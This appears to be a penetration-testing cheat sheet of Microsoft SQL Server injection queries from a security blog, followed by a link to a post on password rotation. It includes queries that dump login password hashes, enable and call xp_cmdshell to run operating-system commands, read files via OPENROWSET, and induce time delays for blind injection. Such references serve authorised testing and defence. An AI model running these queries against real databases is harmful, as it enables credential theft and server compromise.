# Comments
/* Comment /*
-- -
# Version
SELECT @@VERSION;
SELECT version();
# User details
current_user()
suser_name()
system_user()
# Database details
SELECT db_name();
# Database credentials
SELECT name, password_hash FROM master.sys.sql_logins
SELECT name + '-' + master.sys.fn_varbintohexstr(password_hash) from master.sys.sql_logins
# Server details
SELECT host_name();
# Table Name
SELECT name FROM master..sysobjects WHERE xtype = 'U';
SELECT table_name FROM information_schema.tables;
# Columns Names
SELECT name FROM syscolumns WHERE id = (SELECT id FROM sysobjects WHERE name = 'tablename');
SELECT column_name FROM information_schema.columns WHERE table_name = 'tablename';
# String Concatenation
CONCAT(foo, bar)
# Conditionals
SELECT IIF(1=1, 1, 0);
# Time-delay
WAITFOR DELAY '0:0:9'
# Command Execution
EXEC sp_configure 'show advanced options',1;
RECONFIGURE;
EXEC sp_configure 'xp_cmdshell',1;
RECONFIGURE;
EXEC xp_cmdshell 'dir';
# Read Files
SELECT * FROM OPENROWSET(BULK N'', SINGLE_CLOB) AS Contents
# Substrings
SELECT SUBSTRING('Foobar', 1, 1);
Previous
Strong Passwords: The Problem with Rotation
Password rotation has previously been included within best practice guides as a method of minimising the risk of compromised passwords being valid at the time a threat actor attempts to use them. Recent research has indicated that the enforcing password rotation is linked to increased risk of weak passwords, due [...]| Play | Cover | Release Label |
Track Title Track Authors |
|---|